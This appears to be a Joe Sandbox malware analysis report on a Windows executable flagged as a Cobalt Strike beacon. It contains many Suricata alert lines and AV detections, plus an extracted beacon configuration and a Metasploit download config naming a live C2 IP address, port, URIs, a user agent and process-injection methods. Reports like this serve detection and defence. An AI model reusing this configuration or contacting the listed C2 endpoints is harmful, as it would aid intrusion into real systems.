2024-10-08T04:21:15.589155+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54348	47.239.242.141	9999	TCP
2024-10-08T04:21:16.631106+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54349	47.239.242.141	9999	TCP
2024-10-08T04:21:17.666947+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54350	47.239.242.141	9999	TCP
2024-10-08T04:21:18.680858+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54351	47.239.242.141	9999	TCP
2024-10-08T04:21:19.725667+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54352	47.239.242.141	9999	TCP
2024-10-08T04:21:20.756202+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54353	47.239.242.141	9999	TCP
2024-10-08T04:21:21.787557+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54354	47.239.242.141	9999	TCP
2024-10-08T04:21:22.846257+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54355	47.239.242.141	9999	TCP
2024-10-08T04:21:23.867551+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54356	47.239.242.141	9999	TCP
2024-10-08T04:21:24.917082+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54357	47.239.242.141	9999	TCP
2024-10-08T04:21:26.602794+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54358	47.239.242.141	9999	TCP
2024-10-08T04:21:27.626953+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54359	47.239.242.141	9999	TCP
2024-10-08T04:21:28.650140+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54360	47.239.242.141	9999	TCP
2024-10-08T04:21:29.718196+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54361	47.239.242.141	9999	TCP
2024-10-08T04:21:30.764581+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54362	47.239.242.141	9999	TCP
2024-10-08T04:21:31.774660+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54363	47.239.242.141	9999	TCP
2024-10-08T04:21:32.819362+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54364	47.239.242.141	9999	TCP
2024-10-08T04:21:33.867686+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54365	47.239.242.141	9999	TCP
2024-10-08T04:21:34.921388+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54366	47.239.242.141	9999	TCP
2024-10-08T04:21:35.935395+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54367	47.239.242.141	9999	TCP
2024-10-08T04:21:36.953439+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54368	47.239.242.141	9999	TCP
2024-10-08T04:21:38.005590+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54369	47.239.242.141	9999	TCP
2024-10-08T04:21:39.031494+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54370	47.239.242.141	9999	TCP
2024-10-08T04:21:40.068358+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54371	47.239.242.141	9999	TCP
2024-10-08T04:21:41.181692+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54372	47.239.242.141	9999	TCP
2024-10-08T04:21:42.206300+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54373	47.239.242.141	9999	TCP
2024-10-08T04:21:43.259608+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54374	47.239.242.141	9999	TCP
2024-10-08T04:21:44.295192+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54375	47.239.242.141	9999	TCP
2024-10-08T04:21:45.471588+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54376	47.239.242.141	9999	TCP
2024-10-08T04:21:46.530326+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54377	47.239.242.141	9999	TCP
2024-10-08T04:21:47.565211+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54378	47.239.242.141	9999	TCP
2024-10-08T04:21:48.591692+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54379	47.239.242.141	9999	TCP
2024-10-08T04:21:49.601653+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54380	47.239.242.141	9999	TCP
2024-10-08T04:21:50.679123+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54381	47.239.242.141	9999	TCP
2024-10-08T04:21:51.703527+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54382	47.239.242.141	9999	TCP
2024-10-08T04:21:52.750530+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54383	47.239.242.141	9999	TCP
2024-10-08T04:21:53.763817+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54384	47.239.242.141	9999	TCP
2024-10-08T04:21:54.805717+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54385	47.239.242.141	9999	TCP
2024-10-08T04:21:55.857368+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54386	47.239.242.141	9999	TCP
2024-10-08T04:21:56.876826+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54387	47.239.242.141	9999	TCP
2024-10-08T04:21:57.910870+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54388	47.239.242.141	9999	TCP
2024-10-08T04:21:58.934763+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54389	47.239.242.141	9999	TCP
2024-10-08T04:21:59.968982+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54390	47.239.242.141	9999	TCP
2024-10-08T04:22:01.023406+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54391	47.239.242.141	9999	TCP
2024-10-08T04:22:02.025269+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54392	47.239.242.141	9999	TCP
2024-10-08T04:22:03.159107+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54393	47.239.242.141	9999	TCP
2024-10-08T04:22:04.197965+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54394	47.239.242.141	9999	TCP
2024-10-08T04:22:05.226286+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54395	47.239.242.141	9999	TCP
2024-10-08T04:22:06.264581+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54396	47.239.242.141	9999	TCP
2024-10-08T04:22:07.285140+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54397	47.239.242.141	9999	TCP
2024-10-08T04:22:08.308621+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54398	47.239.242.141	9999	TCP
2024-10-08T04:22:09.370550+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54399	47.239.242.141	9999	TCP
2024-10-08T04:22:10.599979+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54400	47.239.242.141	9999	TCP
2024-10-08T04:22:11.622959+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54401	47.239.242.141	9999	TCP
2024-10-08T04:22:12.633664+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54402	47.239.242.141	9999	TCP
2024-10-08T04:22:13.665927+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54403	47.239.242.141	9999	TCP
2024-10-08T04:22:14.687035+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54404	47.239.242.141	9999	TCP
2024-10-08T04:22:15.709139+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54405	47.239.242.141	9999	TCP
2024-10-08T04:22:16.722522+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54406	47.239.242.141	9999	TCP
2024-10-08T04:22:17.759515+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54407	47.239.242.141	9999	TCP
2024-10-08T04:22:18.771722+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54408	47.239.242.141	9999	TCP
2024-10-08T04:22:19.811672+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54409	47.239.242.141	9999	TCP
2024-10-08T04:22:20.818385+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54410	47.239.242.141	9999	TCP
2024-10-08T04:22:21.899635+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54411	47.239.242.141	9999	TCP
2024-10-08T04:22:22.934011+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54412	47.239.242.141	9999	TCP
2024-10-08T04:22:23.956009+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54413	47.239.242.141	9999	TCP
2024-10-08T04:22:25.011811+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54414	47.239.242.141	9999	TCP
2024-10-08T04:22:26.027322+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54415	47.239.242.141	9999	TCP
2024-10-08T04:22:27.065299+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54416	47.239.242.141	9999	TCP
2024-10-08T04:22:28.116771+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54417	47.239.242.141	9999	TCP
2024-10-08T04:22:29.185167+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54418	47.239.242.141	9999	TCP
2024-10-08T04:22:30.200382+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54419	47.239.242.141	9999	TCP
2024-10-08T04:22:31.211254+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54420	47.239.242.141	9999	TCP
2024-10-08T04:22:32.249745+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54421	47.239.242.141	9999	TCP
2024-10-08T04:22:33.310426+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54422	47.239.242.141	9999	TCP
2024-10-08T04:22:34.338421+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54423	47.239.242.141	9999	TCP
2024-10-08T04:22:35.371677+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54424	47.239.242.141	9999	TCP
2024-10-08T04:22:36.426680+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54425	47.239.242.141	9999	TCP
2024-10-08T04:22:37.441154+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54426	47.239.242.141	9999	TCP
2024-10-08T04:22:38.483986+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54427	47.239.242.141	9999	TCP
2024-10-08T04:22:39.523041+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54428	47.239.242.141	9999	TCP
2024-10-08T04:22:40.594466+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54429	47.239.242.141	9999	TCP
2024-10-08T04:22:41.622443+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54430	47.239.242.141	9999	TCP
2024-10-08T04:22:42.638311+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54431	47.239.242.141	9999	TCP
2024-10-08T04:22:43.648966+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54432	47.239.242.141	9999	TCP
2024-10-08T04:22:44.685703+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54433	47.239.242.141	9999	TCP
2024-10-08T04:22:45.720297+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54434	47.239.242.141	9999	TCP
2024-10-08T04:22:46.730235+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54435	47.239.242.141	9999	TCP
2024-10-08T04:22:47.770490+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54436	47.239.242.141	9999	TCP
2024-10-08T04:22:48.779402+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54437	47.239.242.141	9999	TCP
2024-10-08T04:22:49.830759+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54438	47.239.242.141	9999	TCP
2024-10-08T04:22:50.893078+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54439	47.239.242.141	9999	TCP
2024-10-08T04:22:51.920245+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54440	47.239.242.141	9999	TCP
2024-10-08T04:22:52.959198+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54441	47.239.242.141	9999	TCP
2024-10-08T04:22:53.985101+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54442	47.239.242.141	9999	TCP
2024-10-08T04:22:55.013316+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54443	47.239.242.141	9999	TCP
2024-10-08T04:22:56.037196+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54444	47.239.242.141	9999	TCP
2024-10-08T04:22:57.079631+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54445	47.239.242.141	9999	TCP
2024-10-08T04:22:58.098793+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54446	47.239.242.141	9999	TCP
2024-10-08T04:22:59.161579+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54447	47.239.242.141	9999	TCP
2024-10-08T04:23:00.189223+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54448	47.239.242.141	9999	TCP
2024-10-08T04:23:01.194355+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54449	47.239.242.141	9999	TCP
2024-10-08T04:23:02.244536+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54450	47.239.242.141	9999	TCP
2024-10-08T04:23:03.284242+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54451	47.239.242.141	9999	TCP
2024-10-08T04:23:04.286575+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54452	47.239.242.141	9999	TCP
2024-10-08T04:23:05.622789+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54453	47.239.242.141	9999	TCP
2024-10-08T04:23:06.658163+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54454	47.239.242.141	9999	TCP
2024-10-08T04:23:07.685553+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54455	47.239.242.141	9999	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vNenBbeRFZ.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 9999, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "47.239.242.141,/ga.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 391144938, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)\r\n", "Type": "Metasploit Download", "URL": "http://47.239.242.141/BQPy"}

Multi AV Scanner detection for domain / URL

Source: 47.239.242.141	Virustotal: Detection: 16%	Perma Link
Source: http://47.239.242.141:9999/ga.js	Virustotal: Detection: 18%	Perma Link
Source: http://47.239.242.141:9999/BQPy	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: vNenBbeRFZ.exe	ReversingLabs: Detection: 92%
Source: vNenBbeRFZ.exe	Virustotal: Detection: 84%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: vNenBbeRFZ.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7C187 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

0_2_03D7C187

Source: vNenBbeRFZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D791F0 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,		0_2_03D791F0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D747C9 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03D747C9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49744 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57245 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57260 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57241 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57247 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57255 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57256 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54005 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54007 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57244 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57246 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57262 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57259 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49746 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57264 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54001 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57243 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54035 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57251 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57252 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49742 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54011 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54012 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57250 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54058 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57254 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54087 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57265 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54003 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54002 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54093 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57263 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54046 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57248 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54008 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54110 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57258 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54052 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54099 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54004 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54075 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57253 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57261 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54076 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54123 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54141 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54147 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54116 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54000 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54132 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54151 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54022 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54167 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57257 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54029 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57249 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:57242 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54006 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54203 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54180 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54009 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54209 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54197 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54220 -> 47.239.242.141:9999
